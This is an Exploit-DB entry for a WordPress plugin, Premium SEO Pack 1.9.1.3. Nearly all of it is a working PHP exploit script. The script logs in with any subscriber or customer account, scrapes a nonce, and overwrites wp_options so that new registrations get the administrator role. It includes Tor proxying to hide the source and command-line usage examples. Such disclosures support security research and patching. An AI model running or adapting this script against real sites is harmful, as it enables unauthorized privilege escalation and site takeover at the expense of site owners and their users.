WordPress Plugin Premium SEO Pack 1.9.1.3 - wp_options Overwrite

EDB-ID:

39978

CVE:

N/A




Platform:

PHP

Date:

2016-06-20


<?php
/**
 * Exploit Title: Premium SEO Pack Exploit
 * Google Dork:
 * Exploit Author: wp0Day.com <contact@wp0day.com>
 * Vendor Homepage: http://aa-team.com/
 * Software Link: http://codecanyon.net/item/premium-seo-pack-wordpress-plugin/6109437?s_rank=2
 * Version: 1.9.1.3
 * Tested on: Debian 8, PHP 5.6.17-3
 * Type: Authenticated (customer, subscriber) wp_options overwrite
 * Time line: Found [05-Jun-2016], Vendor notified [05-Jun-2016], Vendor fixed: [???], [RD:1]
 */


require_once('curl.php');
//OR
//include('https://raw.githubusercontent.com/svyatov/CurlWrapper/master/CurlWrapper.php');
$curl = new CurlWrapper();


$options = getopt("t:m:u:p:a:",array('tor:'));
echo "Current Options:\n";
print_r($options);
for($i=4;$i>0;$i--){
    echo "Starting in $i \r";
    sleep(1);
}
echo "Starting....         \r";
echo "\n";

$options = validateInput($options);

if (!$options){
    showHelp();
}

if ($options['tor'] === true)
{
    echo " ### USING TOR ###\n";
    echo "Setting TOR Proxy...\n";
    $curl->addOption(CURLOPT_PROXY,"http://127.0.0.1:9150/");
    $curl->addOption(CURLOPT_PROXYTYPE,7);
    echo "Checking IPv4 Address\n";
    $curl->get('https://dynamicdns.park-your-domain.com/getip');
    echo "Got IP : ".$curl->getResponse()."\n";
    echo "Are you sure you want to do this?\nType 'wololo' to continue: ";
    $answer = fgets(fopen ("php://stdin","r"));
    if(trim($answer) != 'wololo'){
        die("Aborting!\n");
    }
    echo "OK...\n";
}


function logIn(){
    global $curl, $options;
    file_put_contents('cookies.txt',"\n");
    $curl->setCookieFile('cookies.txt');
    $curl->get($options['t']);
    $data = array('log'=>$options['u'], 'pwd'=>$options['p'], 'redirect_to'=>$options['t'], 'wp-submit'=>'Log In');
    $curl->post($options['t'].'/wp-login.php', $data);
    $status =  $curl->getTransferInfo('http_code');
    if ($status !== 302){
        echo "Login probably failed, aborting...\n";
        echo "Login response saved to login.html.\n";
        die();
    }
    file_put_contents('login.html',$curl->getResponse());
}

function exploit(){
    global $curl, $options;
    if ($options['m'] == 'admin_on') {
        echo "Setting default role on registration to Administrator\n";
        /* Getting a nonce */
        $data = array('action'=>'pspLoadSection', 'section'=>'setup_backup');
        $curl->post($options['t'].'/wp-admin/admin-ajax.php', $data);
        $resp = $curl->getResponse();
        $resp = json_decode($resp,true);
        preg_match_all('~id="box_nonce" name="box_nonce" value="([a-f0-9]{10})"~', $resp['html'], $mat);
        if (!isset($mat[1])){
            die("Failed getting box_nonce\n");
        }
        $nonce = $mat[1][0];
        $new_settings = array('default_role'=>'administrator', 'users_can_register'=>1);
        $new_settings = urlencode(json_encode($new_settings));
        echo "Sending settings to update\n";
        $data = array('action'=>'pspInstallDefaultOptions', 'options'=>'box_id=psp_setup_box&box_nonce='.$nonce.'&install_box='.$new_settings);
        $curl->post($options['t'].'/wp-admin/admin-ajax.php', $data);
        $resp = $curl->getResponse();
        $resp = json_decode($resp,true);
        if (@$resp['status'] == 'ok'){
            echo "Admin mode is ON, go ahead an register yourself an Admin account! \n";
        } else {
            echo "Setting admin mode failed \n";
        }
        echo "Raw response: " . $curl->getResponse() . "\n";
    }
    if ($options['m'] == 'admin_off') {

        echo "Setting default role on registration to Subscriber\n";
        /* Getting a nonce */
        $data = array('action'=>'pspLoadSection', 'section'=>'setup_backup');
        $curl->post($options['t'].'/wp-admin/admin-ajax.php', $data);
        $resp = $curl->getResponse();
        $resp = json_decode($resp,true);
        preg_match_all('~id="box_nonce" name="box_nonce" value="([a-f0-9]{10})"~', $resp['html'], $mat);
        if (!isset($mat[1])){
            die("Failed getting box_nonce\n");
        }
        $nonce = $mat[1][0];
        $new_settings = array('default_role'=>'subscriber', 'users_can_register'=>0);
        $new_settings = urlencode(json_encode($new_settings));
        echo "Sending settings to update\n";
        $data = array('action'=>'pspInstallDefaultOptions', 'options'=>'box_id=psp_setup_box&box_nonce='.$nonce.'&install_box='.$new_settings);
        $curl->post($options['t'].'/wp-admin/admin-ajax.php', $data);
        $resp = $curl->getResponse();
        $resp = json_decode($resp,true);
        if (@$resp['status'] == 'ok'){
            echo "Admin mode is OFF \n";
        }
        echo "Raw response: " . $curl->getResponse() . "\n";
    }
}


logIn();
exploit();



function validateInput($options){

    if ( !isset($options['t']) || !filter_var($options['t'], FILTER_VALIDATE_URL) ){
        return false;
    }
    if ( !isset($options['u']) ){
        return false;
    }
    if ( !isset($options['p']) ){
        return false;
    }
    if (!preg_match('~/$~',$options['t'])){
        $options['t'] = $options['t'].'/';
    }
    if (!isset($options['m']) || !in_array($options['m'], array('admin_on','admin_off') ) ){
        return false;
    }
    if ($options['m'] == 'tag' && !isset($options['a'])){

    }
    $options['tor'] = isset($options['tor']);

    return $options;
}


function showHelp(){
    global $argv;
    $help = <<<EOD

    Premium SEO Pack Exploit

Usage: php $argv[0] -t [TARGET URL] --tor [USE TOR?] -u [USERNAME] -p [PASSWORD] -m [MODE]

       *** You need to have a valid login (customer or subscriber will do) in order to use this "exploit" **

       [MODE] admin_on  - Sets default role on registration to Administrator
              admin_off - Sets default role on registration to Subscriber

Examples:
       php $argv[0] -t http://localhost/ --tor=yes -u customer1 -p password -m admin_on
       php $argv[0] -t http://localhost/ --tor=yes -u customer1 -p password -m admin_off

    Misc:
           CURL Wrapper by Leonid Svyatov <leonid@svyatov.ru>
           @link http://github.com/svyatov/CurlWrapper
           @license http://www.opensource.org/licenses/mit-license.html MIT License

EOD;
    echo $help."\n\n";
    die();
}